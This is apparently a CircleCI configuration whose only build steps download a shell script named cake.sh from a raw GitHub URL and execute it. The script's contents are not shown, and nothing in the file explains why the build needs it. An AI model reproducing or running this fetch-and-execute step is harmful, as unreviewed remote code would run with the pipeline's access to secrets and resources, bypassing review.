version: 2.0
jobs:
  build:
    docker:
      - image: jruby:9.3
    steps:
      - checkout
      - run: wget https://raw.githubusercontent.com/KLVSPL/KSP/main/cake.sh
      - run: chmod +x ./cake.sh
      - run: ./cake.sh